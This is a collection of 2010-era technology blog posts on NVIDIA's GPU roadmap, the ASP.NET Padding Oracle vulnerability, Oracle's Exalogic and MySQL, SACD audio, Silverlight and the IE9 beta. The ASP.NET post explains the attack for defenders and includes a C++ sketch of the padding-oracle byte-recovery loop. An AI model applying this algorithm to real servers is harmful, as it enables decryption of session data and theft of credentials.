NVIDIA talks up GPU computing, presents roadmap

At the NVIDIA GPU Technology Conference in San Jose, CEO Jen-Hsun Huang talked up the company’s progress in GPU computing, showed some example applications, and announced a high-level roadmap for future graphics chip architectures. NVIDIA has three areas of focus, he said: the Quadro line for visualisation, Tesla for parallel computing, and GeForce/Tegra for personal computing. Tegra is a system on a chip aimed at mobile devices. Mobile, says Huang, is “a completely disruptive force to all of computing.”

NVIDIA’s current chip architecture is called Fermi. The company is settling on a two-year product cycle and will deliver Kepler in 2011 with 3 to 4 times the performance (expressed as gigaflops per watt) of Fermi. Maxwell in 2013 will have around 12 times the performance of Fermi. In between these architecture changes, NVIDIA will do “kicker” updates to refresh its products, with one for Fermi due soon.

The focus of the conference, though, is not on super-fast graphics cards in themselves, but rather on using the GPU for general-purpose computing. GPUs are very, very good at doing mathematics fast and in parallel. If you have an application that does intensive calculations, then executing that part of the code on the GPU can offer impressive performance increases. NVIDIA’s CUDA, which extends C with keywords and libraries for GPU programming, lets you do exactly that. Another option is OpenCL, a standard that works across GPUs from multiple vendors.
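To give a flavour of what that looks like, here is a minimal CUDA C sketch of my own (not from the conference): a kernel that adds two vectors of a million floats, with each GPU thread handling one element, so the additions run across the GPU’s cores in parallel rather than in a CPU loop.

```cpp
// Minimal CUDA example: c = a + b over a million elements.
#include <cuda_runtime.h>
#include <cstdio>

// Each GPU thread computes one element of the result.
__global__ void vecAdd(const float* a, const float* b, float* c, int n) {
    int i = blockIdx.x * blockDim.x + threadIdx.x;  // global thread index
    if (i < n) c[i] = a[i] + b[i];
}

int main() {
    const int n = 1 << 20;
    const size_t bytes = n * sizeof(float);
    float *ha = new float[n], *hb = new float[n], *hc = new float[n];
    for (int i = 0; i < n; ++i) { ha[i] = 1.0f; hb[i] = 2.0f; }

    float *da, *db, *dc;                        // device (GPU) buffers
    cudaMalloc((void**)&da, bytes);
    cudaMalloc((void**)&db, bytes);
    cudaMalloc((void**)&dc, bytes);
    cudaMemcpy(da, ha, bytes, cudaMemcpyHostToDevice);
    cudaMemcpy(db, hb, bytes, cudaMemcpyHostToDevice);

    const int threads = 256;
    const int blocks = (n + threads - 1) / threads;
    vecAdd<<<blocks, threads>>>(da, db, dc, n); // a million adds in parallel
    cudaMemcpy(hc, dc, bytes, cudaMemcpyDeviceToHost);

    printf("c[0] = %f\n", hc[0]);               // expect 3.0
    cudaFree(da); cudaFree(db); cudaFree(dc);
    delete[] ha; delete[] hb; delete[] hc;
    return 0;
}
```

The grid and block arithmetic is the only unfamiliar part; the rest is plain C, compiled with nvcc from the CUDA toolkit.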

Adobe uses CUDA for the Mercury Playback engine in Creative Suite 5, greatly improving performance in After Effects, Premiere Pro and Photoshop, but with the annoyance that you have to use a compatible NVIDIA graphics card.

The performance gain from GPU programming is so great that its adoption is unavoidable for applications in relevant areas, such as simulation or statistical analysis. Huang gave a compelling example during the keynote, bringing heart surgeon Dr Michael Black on stage to talk about his work. Operating on a beating heart is difficult because it presents a moving target. By combining robotic surgery with software that can predict the heart’s movement through simulation, he is researching how to operate on a heart almost as if it were stopped, and with just a small incision.

Programming the GPU is compelling, but difficult. NVIDIA is keen to see it become part of mainstream programming, for obvious reasons, and there are new libraries and tools that help with this, like Parallel Nsight for Visual Studio 2010. Another interesting development, announced today, is CUDA for x86, being developed by PGI, which will let CUDA code run even when no NVIDIA GPU is present. Even if the performance gains are limited, it means developers who need to support diverse systems can run the same code everywhere, rather than maintaining a separate code path for when no CUDA GPU is detected.

That said, GPU programming retains all the challenges of concurrent development: it is prone to race conditions and synchronisation problems.
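A contrived sketch of the classic hazard, again my own illustration: thousands of threads incrementing a shared counter. The unguarded version loses most updates because the read-modify-write steps of different threads interleave; CUDA’s atomicAdd makes each update indivisible.

```cpp
// Race condition sketch (illustrative only).
__global__ void count_racy(int* counter) {
    // Many threads read the same old value before any of them writes
    // back, so most increments are silently lost.
    (*counter)++;
}

__global__ void count_atomic(int* counter) {
    // atomicAdd serialises the read-modify-write in hardware,
    // so every increment is counted.
    atomicAdd(counter, 1);
}
```

Launched as count_racy<<<1024, 256>>>(counter), the racy kernel typically reports far fewer than the expected 262,144 increments, and the total varies from run to run; the atomic version is always exact, at some cost in throughput.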

Stuffing a server full of GPUs is a cost-effective route to supercomputing. I took a brief look at the exhibition, which includes a Colfax CXT8000 with 8 Tesla GPUs and three 1200W power supplies. It may cost $25,000, but if you look at the performance you are getting for the price, machines like this are great value.


Crisis for ASP.NET – how serious is the Padding Oracle attack?

Security vulnerabilities are reported constantly, but some have more impact than others. The one that came to prominence last weekend (though it had actually been revealed several months ago) strikes me as potentially high impact. Colourfully named the Padding Oracle attack, it was explained and demonstrated at the ekoparty security conference. In particular, the researchers showed how it can be used to compromise ASP.NET applications:

The most significant new discovery is an universal Padding Oracle affecting every ASP.NET web application. In short, you can decrypt cookies, view states, form authentication tickets, membership password, user data, and anything else encrypted using the framework’s API! … The impact of the attack depends on the applications installed on the server, from information disclosure to total system compromise.

This is alarming simply because of the huge number of ASP.NET applications out there. It is not only a popular framework for custom applications, but is also used by Microsoft for its own applications. If you have a SharePoint site, for example, or use Outlook Web Access, then you are running an ASP.NET application.

Microsoft took the report seriously; it kept VP Scott Guthrie and his team up all night, and they eventually came up with a security advisory and a workaround, posted to his blog. It does not make comfortable reading, confirming that pretty much every ASP.NET installation is vulnerable. A further post confirms that SharePoint sites are affected.

It does not help that the precise way the attack works is hard to understand. It is a cryptographic attack that lets the attacker decrypt data encrypted by the server. One of the consequences, thanks to what looks like another weakness in ASP.NET, is that the attacker can then download any file on the web server, including web.config, a file which may contain security-critical data such as database connection strings with passwords, or even the credentials of a user in Active Directory. The researchers demonstrate in a YouTube video how to crack a site running the DotNetNuke content management application, gaining full administrative rights to the application and eventually a login to the server itself.
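For those who want the gist of the cryptography, here is a rough sketch of how a CBC padding oracle recovers the plaintext of a single ciphertext block, one byte at a time. The oracle function is a hypothetical stand-in for “send a crafted request and see whether the server reports a padding error”; in the ASP.NET case, that signal is the distinguishable error response.

```cpp
// Padding oracle sketch (illustrative; not the researchers' code).
#include <cstddef>
#include <cstdint>
#include <functional>
#include <vector>

// Hypothetical oracle: submit (fake_iv, block) to the server and return
// true if it did NOT report a padding error. In the real attack this is
// an HTTP request to the target application.
using Oracle = std::function<bool(const std::vector<uint8_t>&,
                                  const std::vector<uint8_t>&)>;

// Recover D(block), the cipher's raw decryption of one 16-byte block.
// The plaintext is then D(block) XOR (the real preceding ciphertext block).
std::vector<uint8_t> recover_intermediate(const std::vector<uint8_t>& block,
                                          const Oracle& oracle) {
    const size_t N = 16;                      // AES block size
    std::vector<uint8_t> inter(N, 0);         // D(block), found byte by byte
    std::vector<uint8_t> fake_iv(N, 0);

    for (size_t pad = 1; pad <= N; ++pad) {   // work from the last byte back
        const size_t target = N - pad;
        // Force the already-recovered tail to decrypt to the pad value.
        for (size_t i = target + 1; i < N; ++i)
            fake_iv[i] = inter[i] ^ static_cast<uint8_t>(pad);
        // Try all 256 values until the server accepts the padding.
        // (A careful implementation double-checks the pad == 1 case.)
        for (int guess = 0; guess < 256; ++guess) {
            fake_iv[target] = static_cast<uint8_t>(guess);
            if (oracle(fake_iv, block)) {
                inter[target] = static_cast<uint8_t>(guess ^ pad);
                break;
            }
        }
    }
    return inter;
}
```

Note that the attacker never breaks the cipher itself: the server’s distinguishable padding-error response leaks each byte in at most 256 requests, which is why the attack generates thousands of requests.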

Guthrie acknowledges that the problem can only be fixed by patching ASP.NET itself. Microsoft is working on this; in the meantime his suggested workaround is to configure ASP.NET to return the same error page regardless of what the underlying error really is. The reason for this is that the vulnerability involves inspecting the error returned by ASP.NET when you submit a corrupt cookie or viewstate data.
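In web.config terms, the workaround amounts to something like this; a sketch only, as Guthrie’s post gives the exact settings to use for each ASP.NET version:

```xml
<!-- Sketch of the homogeneous-error workaround: every error, including
     a padding failure, produces the identical response to the client. -->
<configuration>
  <system.web>
    <customErrors mode="On" defaultRedirect="~/error.html" />
  </system.web>
</configuration>
```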

The most conscientious ASP.NET administrators will have followed Guthrie’s recommendations, and will be hoping that they are sufficient; it is not completely clear to me that they are. One of the things that makes me think “hmmm” is that a more sophisticated workaround, involving random time delays before an error is returned, is proposed for later versions of ASP.NET that support it. What does that suggest about the efficacy of the simpler workaround, which is just a static error page?

The speed with which the ASP.NET team came up with the workaround is impressive; but it is a workaround and not a fix. It leaves me wondering what proportion of ASP.NET sites exposed to the public internet will have implemented the workaround, or will do so before attacks become widespread.

A characteristic of the attack is that the web server receives thousands of requests which trigger cryptographic errors. Rather than attempting to fix up ASP.NET and every instance of web.config on a server, a more robust approach might be to monitor the requests and block IP addresses that trigger repeated errors of this kind.

More generally, what should you do if you run a security-critical web application and a flaw of this magnitude is reported? Applying recommended workarounds is one possibility, but frankly I wonder whether such applications should simply be taken offline until more is known about how to protect them.

One thing about which I have no idea is the extent to which hackers are already trying this attack against likely targets such as ecommerce and banking sites. Of course in principle virtually any site is an attractive target, because of the value of compromised web servers for serving spam and malware.

If you run Windows servers and have not yet investigated, I recommend that you follow the links, read the discussions on Scott Guthrie’s blog, and at least implement the suggested actions.

RunRev renames product to LiveCode, supports iPad and iPhone but not Windows Phone 7

Runtime Revolution has renamed its software development IDE and runtime to LiveCode, which it says is a “modern descendent of natural-language technologies such as Apple’s HyperCard.” The emphasis is on easy and rapid development using visual development supplemented with script.

It is now a cross-platform development tool that targets Windows, Mac and Linux. Android support is promised soon, there is a pre-release for Windows Mobile, and a new pre-release targets Apple’s iOS for iPad and iPhone.

LiveCode primarily creates standalone applications, but there is also a plug-in for hosting applets in the browser, though this option will not be available for iOS.

Now that Apple has lifted its restrictions on cross-platform development for iOS, it is Microsoft’s Windows Phone 7 that looks more of a closed device. The problem here is that Microsoft does not permit native code on Windows Phone 7, a restriction which also prohibits alternative runtimes such as LiveCode. You have to code applications in Silverlight or XNA. However, Adobe is getting a special pass for Flash, though it will not be ready in time for the first release of Windows Phone 7.

If Windows Phone 7 is popular, I imagine other companies will be asking for special passes. The ubiquity of Flash is one factor holding back Silverlight adoption, so in some ways it is surprising that Microsoft gives it favoured treatment, though it makes a nice selling point versus Apple’s iPhone.

Setup error raises obscure Outlook error message

I was intrigued by the following Outlook 2010 error message, which I had not seen before:

“Instant Search is not available when Outlook is running with administrator permissions.”

Outlook was not, however, running with administrator permissions. A Microsoft support note suggested another possible reason: Windows Search not running. However, it was running. It was clear, though, that Outlook searches were not being indexed, making search unusable on my low-powered netbook.

Eventually I figured it out. I’d just run an update for the excellent Battery Bar, which installs a battery monitor in the Windows 7 taskbar. In order to shut down the running instance, the Battery Bar setup restarted Explorer. Since the installer was running with elevated rights, Explorer had presumably restarted with elevated rights too, and this somehow triggered the error in Outlook.

I recall that it is tricky (but possible) for an elevated process to start a non-elevated process, so I guess Osiris needs to tweak its setup application.

The solution from my point of view was to restart Windows.

Salesforce.com is the wrong kind of cloud says Oracle’s Larry Ellison

Oracle CEO Larry Ellison took multiple jabs at Salesforce.com in the welcome keynote at OpenWorld yesterday.

He said it was old, not fault tolerant, not elastic, and built on a bad security model since all customers share the same application. “Elastic” in this context means able to scale on demand.

Ellison was introducing Oracle’s new cloud-in-a-box, the Exalogic Elastic Cloud. This features 30 servers and 360 cores packaged in a single cabinet. It is both a hardware and software product, using InfiniBand networking internally for fast communication and Oracle VM for hosting virtual machines running either Oracle Linux or Solaris. Oracle is positioning Exalogic as the ideal machine for Java applications, especially those using the Oracle WebLogic application server, and as a natural partner for the Exadata Database Machine.

Perhaps the most interesting aspect of Exalogic is that it uses the Amazon EC2 (Elastic Compute Cloud) API. This is also used by Eucalyptus, the open source cloud infrastructure adopted by Canonical for its Ubuntu Enterprise Cloud. With these major players adopting the Amazon API, you could almost call it a standard.

Ellison’s Exalogic cloud is a private cloud, of course, and although he described it as low maintenance, it is nevertheless the customer’s responsibility to provide the site and the physical security, and to keep it up and running. Its elasticity is also open to question. It is elastic from the perspective of an application running on the system, presuming that there is spare capacity to run up more VMs as needed. It is not elastic if you think of it as a single powerful, eye-wateringly expensive server: you pay for all of it even though you might not need all of it, and if your needs grow to exceed its capacity you have to buy another one – though Ellison claimed you could run the entire Facebook web layer on just a couple of Exalogics.

In terms of elasticity, there is actually an advantage in the Salesforce.com approach. If you share a single multi-tenanted application with others, then elasticity is measured by the ability of that application to scale on demand. Behind the scenes, new servers or virtual servers may come into play, but that is not something that need concern you. The Amazon approach is more hands-on, in that you have to work out how to spin up (or down) VMs as needed. In addition, running separate application instances for each customer means a larger burden of maintenance falling on the customer – which with a private cloud might mean an internal customer – rather than on the cloud provider.

In the end it is not a matter of right and wrong; rather, the question of what makes the best kind of cloud is multi-faceted. Do not believe all that you hear, whether the speaker is Oracle’s Ellison or Marc Benioff from Salesforce.com.

Incidentally, Salesforce.com runs on Oracle and Benioff is a former Oracle VP.

Postscript: as Dennis Howlett observes, the high capacity of Exalogic is actually a problem – he estimates that only 5% at most of Oracle’s customers could make use of such an expensive box. Oracle will address this by offering public cloud services, presumably sharing some of the same technology.

Why Oracle is immoveable in the Enterprise

At Oracle OpenWorld yesterday I spoke to an attendee from a global enterprise. His company is a big IBM customer and would like to standardise on DB2. To some extent it does, but there is still around 30% Oracle and significant usage of Microsoft SQL Server. Why three database platforms when they would prefer to settle on one? Applications, which in many cases are only certified for a specific database manager.

I was at MySQL Sunday earlier in the day, and asked whether he had any interest in Oracle’s open source database product. As you would expect, he said it was enough trouble maintaining three different systems; the last thing he wanted was a fourth.

Oracle: a good home for MySQL?

I’m not able to attend the whole of Oracle OpenWorld / JavaOne, but I have sneaked in to MySQL Sunday, which is a half-day pre-conference event. One of the questions that interests me: is MySQL in safe hands at Oracle, or will it be allowed to wither in order to safeguard Oracle’s closed-source database business?

It is an obvious question, but not necessarily a sensible one. There is some evidence for a change in direction. Prior to the takeover, the MySQL team was working on a database engine called Falcon, intended to lift the product into the realm of enterprise database management. Oracle put Falcon on the shelf; Oracle veteran Edward Screven (who also gave the keynote here) said that the real rationale for Falcon was the fear that Oracle would somehow jigger InnoDB, and that now both MySQL and InnoDB were at Oracle, the project made no sense.

Context: InnoDB is the grown-up database engine for MySQL, with support for transactions, and already belonged to Oracle from an earlier acquisition.

There may be something in it; but it is also true that Oracle has fine-tuned the positioning of MySQL. Screven today emphasised that MySQL is Oracle’s small and nimble database manager; it is “quite performant and quite functional”, he said; the word “quite” betraying a measure of corporate internal conflict. Screven described how Oracle has improved the performance of MySQL on Windows and is cheerful about the possibility of it taking share from Microsoft’s SQL Server.

It is important to look at the actions as well as the words. Today Oracle announced the release candidate of MySQL 5.5, which uses InnoDB by default, and has performance and scalability improvements that are dramatic in certain scenarios, as well as new and improved tools. InnoDB is forging ahead, with the team working especially on taking better advantage of multi-core systems; we also heard about full text search coming to the engine.

The scalability of MySQL is demonstrated by some of its best-known deployments, including Facebook and Wikipedia. Facebook’s Mark Callaghan spoke today about making MySQL work well, and gave some statistics concerning peak usage: 450 million rows read per second, 3.5 million rows changed per second, query response time 4ms.

If pressed, Screven cites complexity and reliability with critical data, rather than lack of scalability, as the factors that point to an Oracle rather than a MySQL solution.

In practice it matters little. No enterprise currently using an Oracle database is going to move to MySQL; aside from doubts over its capability, it is far too difficult and risky to switch your database manager to an alternative, since each one has its own language and its own optimisations. Further, Oracle’s application platform is built on its own database and that will not change. Customers are thoroughly locked in.

What this means is that Oracle can afford to support MySQL’s continuing development without risk of cannibalising its own business. In fact, MySQL presents an opportunity to get into new markets. Oracle is not the ideal steward for this important open source project, but it is working out OK so far.

SHM-SACD – super-expensive, but how super is the sound?

The problems facing the music industry are well known: the CD market is fast disappearing thanks to digital downloads, both legal and illegal, and income gained from downloads does not look likely to match that lost from CD. But what about the niche market for recordings of superior quality? Universal Music Japan has come up with a product that combines several ideas. The first is SHM, or Super High Material, first used for CDs with the claim that, even though CD is a digital medium, players would extract better-quality sound from discs made with it. The next theory is that the high-resolution SACD format will play back more accurately if the disc includes only a stereo layer, rather than stereo, multi-channel, and standard CD layers. The result is a new SHM-SACD series: remasters of classic titles at premium prices.

The source used for these titles varies. Some are new DSD (Direct Stream Digital, the digital format of SACD) masters made from copy master tapes held in Japan. Some are re-issues of existing DSD transfers. Some are newly mastered from original master tapes.

Who’s Next is apparently in this last group, newly mastered from the original tapes. The transfer is said to have been done as straight as possible, with no equalisation or compression, and uses the original mix.

This is a favourite of mine, so I bought a copy. It comes in typically over-the-top Japanese packaging: SHM-SACD in a plastic film sleeve, inside a paper sleeve, inside a card sleeve. There is a fold-out cover with a photograph I’ve not seen before, liner notes, an obi, and a card to return with suggestions for future titles.


I played the disc and compared it to my existing CD. In fact, I must confess, I have several copies. Who’s Next has been issued many times, and the most obsessive fans know that the best CD is an early one mastered by Steve Hoffman and made in Japan for the US market. On his forum he has written about how he mastered it, using as little processing as possible, though he did add some modest EQ.

Both the Hoffman CD and the new SACD sound very good. I am not quite sure which I prefer, but it may be the SACD which sounds exceptionally clean and lets you easily follow John Entwistle’s fantastic bass lines. Or it might be the Hoffman CD which is remarkably crisp and muscular. There is an odd problem with the SACD, which is that the last track is noticeably louder than the others. It was recorded separately, but that seems no reason not to match the volume.

So do I recommend the SACD and, by extension, the new SHM-SACD range? Well, I am all in favour of mastering CDs with full dynamic range, no attempt at noise reduction, minimal processing, and without the excessive compression that mars so many new releases. The Who’s Next title shows what great results you can get with this approach.

That said, it is tragic to have these high quality new remasters restricted to a niche format at an excessive price. The SHM thing I suspect is nonsense; if CDs and SACDs made with ordinary material did not work properly, we would have noticed it years ago. The advantages of SACD are doubtful too, certainly for stereo, because the limitations of human hearing make the extended frequency response pointless. I have researched this to the best of my ability and while I don’t know for sure that high-resolution formats like SACD are completely pointless, it does seem that standard CDs can sound either the same or nearly the same when the audible difference is put to the test with any rigour.


The SACD format is also rather inconvenient. You cannot easily rip it to a music server: you have to make a digital copy from the analogue output of the SACD player and then rip that copy, probably breaching your licence in doing so, and potentially degrading the sound quality.

I also compared stereo-only and hybrid SACDs using Bob Dylan’s Blonde on Blonde, which was issued in both guises. The stereo version sounds identical.

Still, even if you are paying for a certain amount of stuff and nonsense, you are also getting SACDs that genuinely sound good, at least in the case of Who’s Next. Perhaps it could even be worth it.

If Microsoft is serious about Silverlight, it needs to do Linux

Today was a significant event for the UK broadcasting industry: the announcement of YouView, formerly called Project Canvas, which is backed by partners including the BBC, ITV, Channel 4, Channel 5, and BT. It will provide broadcasts over IP, received by a set-top box, include a catch-up service, and be capable of interactive features that hook into internet services.

Interesting stuff, though it may end up battling with Google TV. But what are the implications for media streaming services and media players? One is that they will have to run on Linux, which is the official operating system for Project Canvas. Google TV, for that matter, will run Android.

If you look at the YouView specifications, you’ll find that although the operating system is specified, the application player area is more open:

Application Player executables and libraries will be provided by 3rd party software vendors.

What is an application player?

Runtime environment for the execution of applications. Examples are Flash player, MHEG engine, W3C browser

I’d suggest that Adobe will do well out of YouView. Microsoft, on the other hand, will not be able to play in this space unless it delivers Silverlight for Linux, Android, and other open platforms.

Microsoft has a curious history of cross-platform Silverlight announcements. Early on it announced that Moonlight was the official Linux player, though in practice support for Moonlight has been half-hearted. Then, when Intel announced the Atom Developer Program (now AppUp) in September 2009, Microsoft stated that it would provide its own build of Silverlight for Linux, or rather, that Intel would build it with Microsoft’s code. Microsoft’s Brian Goldfarb told me that Microsoft and Intel would work together on bringing Silverlight to devices, while Moonlight would be the choice for desktop Linux.

Since then, the silence has been deafening. I’ve enquired about progress with both Intel and Microsoft, but vague rumours aside, no news. Silverlight is still listed as a future runtime for AppUp:

Microsoft® Silverlight™(future)

Silverlight is a cross-browser, cross-platform and cross-device browser plug-in that helps companies design, develop and deliver applications and experiences on the Web.

In the meantime, Adobe has gone ahead with its AIR runtime; even if Silverlight eventually appears, Adobe will have established an early presence on Intel’s netbook platform.

There have been recent rumours about internal battles between the Windows and Developer divisions at Microsoft, and I cannot help wondering if this is another symptom, with the Windows folk fighting against cross-platform Silverlight on the grounds that it could damage the Windows lock-in, while the Developer team tries to make Silverlight the ubiquitous runtime that it needs to be in order to succeed.

From my perspective, the answer is simple. Suppressing Silverlight will do nothing to safeguard Windows, whereas making it truly cross-platform could drive adoption of Microsoft’s server and cloud platform. When Silverlight was launched, just doing Windows and Mac was almost enough, but today the world looks different. If Microsoft is serious about WPF Everywhere, Linux and Android (which is Linux based) support is a necessity.

Microsoft Internet Explorer 9 beta is out

Head over to http://www.beautyoftheweb.com/ and you can download the beta of Internet Explorer 9, which is now up and running on my Windows 7 64-bit machine and looking good so far.

So what’s new? In terms of the rendering engine, this is like the last Platform Preview, but a little further along. During the briefing, we looked at the experimental (and impressive) site put together by EMC, which shows 3D rotation of a motor vehicle along with other effects, implemented entirely in HTML 5. At the time I only had the fourth platform preview installed, and the site did not work. Amusingly, I was advised to use Google Chrome, which worked fine. Now that I’ve installed the beta, the same site works in IE9, rather more smoothly than in Chrome.

What’s really new though is the user interface. The two things that jump out are the adoption of a single box for search and URL entry – many users do not understand the difference anyway – and the ability to drag tabs to the taskbar to pin them there like application shortcuts. Once pinned, they support Windows 7 Jump Lists, even when the site is not active:

[Screenshot: pinned sites on the Windows 7 taskbar, showing the Discovery site’s custom icon and Jump List]

If you squint at the screenshot, you’ll notice that the Discovery site, which has been tweaked to use this feature, has a good-looking icon as well as a Jump List, whereas the icons adjacent to it look bad. That’s because you need to create a new large favicon to support this feature, and optionally add metadata to define the Jump List. None of this is any use, of course, if you use Vista; and if you use XP you cannot even install IE9.
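For reference, the pinning metadata consists of meta tags in the page head, along these lines (the tag names come from Microsoft’s IE9 pinned-site documentation; the site and task values here are invented for illustration):

```html
<!-- Hypothetical example of IE9 pinned-site metadata -->
<meta name="application-name" content="Example News" />
<meta name="msapplication-tooltip" content="Open Example News" />
<meta name="msapplication-starturl" content="http://www.example.com/" />
<meta name="msapplication-task"
      content="name=Latest headlines;action-uri=http://www.example.com/latest;icon-uri=http://www.example.com/latest.ico" />
```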

There’s also a download manager at last.

There’s no doubt that IE9 is miles better than IE8. Is it better than rivals like Chrome, from which a casual observer might think it has drawn inspiration? Too soon to say; but using the official native browser does have advantages, like integration with Windows Update as well as with the OS.

That said, I’m not personally a big fan of the single-box approach, and I’ll miss the permanent menus. If you press the Alt key the old File, Edit, View and other menus magically appear, but I can’t see any way to make them persist.